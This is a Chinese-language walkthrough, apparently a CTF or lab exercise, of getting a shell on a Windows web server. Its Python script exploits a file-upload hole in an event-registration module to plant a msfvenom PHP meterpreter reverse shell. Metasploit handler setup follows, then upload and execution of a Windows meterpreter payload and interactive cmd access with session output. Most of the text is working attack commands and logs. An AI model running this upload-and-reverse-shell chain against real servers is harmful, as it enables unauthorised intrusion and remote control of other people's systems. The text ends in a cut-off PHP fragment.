有梦就能实现 2020-03-04
本地kali linux 192.168.1.2
目标 windows NT 服务器192.168.1.4
目的是获取shell
首先在linux建立终端
,msfconsole
建立php的payload,shell.php
:~# rz :~# msfconsole msf > msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php [*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 30092 bytes
通过脚本上传到服务器。这里python脚本在本地windows编写然后通过xshell rz 传到kali。 pxy同学提供
import requests base_url=‘http://192.168.1.4/‘ url_for_time=‘index.php?module=eventregistration&action=eventsCalendar‘ url_for_upload=‘index.php?module=eventregistration&action=emailRegistrants&&email_message=1&email_subject=1‘ files={‘attach‘:open(‘shell.php‘,‘rb‘)} requests.post(base_url+url_for_upload,files=files) print ‘upload finish‘ r=requests.get(base_url+url_for_time) html1=r.content #print html1 index=r.content.find(‘History.pushState‘) if index: time=html1[index:index+60].split(‘rel‘)[1].split(‘\‘‘)[1] else: print ‘something wrong‘ exit(0) print "get time:"+ time for i in range(int(time),int(time)-20,-1): shell_url=base_url+‘tmp/‘+str(i)+‘_shell.php‘ r2=requests.get(shell_url) if r2.status_code==200: print "shell is here : "+shell_url
然后在msfconsole中use multi/handle 开启监听 use php/meterpreter/reverse-tcp, set LHOST set LPORT exploit
msf > use multi/handler msf exploit(handler) > set payload php/meterpreter_reverse_tcp payload => php/meterpreter_reverse_tcp msf exploit(handler) > set LHOST 192.168.1.2 LHOST => 192.168.1.2 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.1.2:4444
访问页面
然后看本地的终端已经建立了session
sessions查看已有session,sessions -i 1使用第一个session
利用该php的session可以做一些基础的操作比如pwd。。
但是不能使用windows的shell,这也是为什么接下来要做windows的payload
msf exploit(handler) > [*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:49203) at 2020-02-27 01:02:27 -0500 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ls Listing: C:\phpStudy\WWW\tmp ============================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache 40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c
然后新建终端,msfconsole,新建windows payload,shell.exe。注意端口要和php的不重复
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe [*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of exe file: 73802 bytes Saved as: shell.exe
然后用刚刚php的session upload 到服务器,
meterpreter > ls Listing: C:\phpStudy\WWW\tmp ============================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache 40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c meterpreter > upload shell.exe [*] uploading : shell.exe -> shell.exe [*] uploaded : shell.exe -> shell.exe meterpreter > ls Listing: C:\phpStudy\WWW\tmp ============================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou 40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache 100777/rwxrwxrwx 73802 fil 2020-02-26 17:02:33 -0500 shell.exe 40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c
此时在新建的终端use multi/handle 开启监听 use windows/meterpreter/reverse-tcp,set LHOST set LPORT exploit
:~# msfconsole _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___ =[ metasploit v4.16.15-dev ] + -- --=[ 1699 exploits - 968 auxiliary - 299 post ] + -- --=[ 503 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.2 LHOST => 192.168.1.2 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.1.2:443
然后用php的session执行刚刚的windows的payload execute -f shell.exe
meterpreter > execute shell.exe [-] You must specify an executable file with -f meterpreter > execute shell.exe -f [-] You must specify an executable file with -f meterpreter > execute -f shell.exe Process 2640 created.
此时看新终端,检测到了session
然后类似于上面的php的操作步骤,可以使用这个session
同时可以使用 windows的 shell
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.1.4 [*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.4:49204) at 2020-02-27 01:05:06 -0500 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 640 created. Channel 1 created. Microsoft Windows [°汾 6.3.9600] (c) 2013 Microsoft Corporation¡£±£´???{¡£ C:\phpStudy\WWW\tmp>cd C: cd C: C:\phpStudy\WWW\tmp C:\phpStudy\WWW\tmp>cd^H^H^H ‘ ²»ˇ?²¿»??¿?®£¬?²»ˇ¿??е?? »??¦mτ¼þ¡£ C:\phpStudy\WWW\tmp>c: c:
cmd 命令 chcp 65001 C:\>type 2.key type 2.key ¾??¡£ C:\>chcp 65001 chcp 65001 Active code page: 65001 C:\>type 2.key type 2.key Access is denied.
<?php. if (!empty($_POST)) {. $data1 = $_POST["data1"];$data2 = $_POST["data2"];$fuhao = $_POST["fuh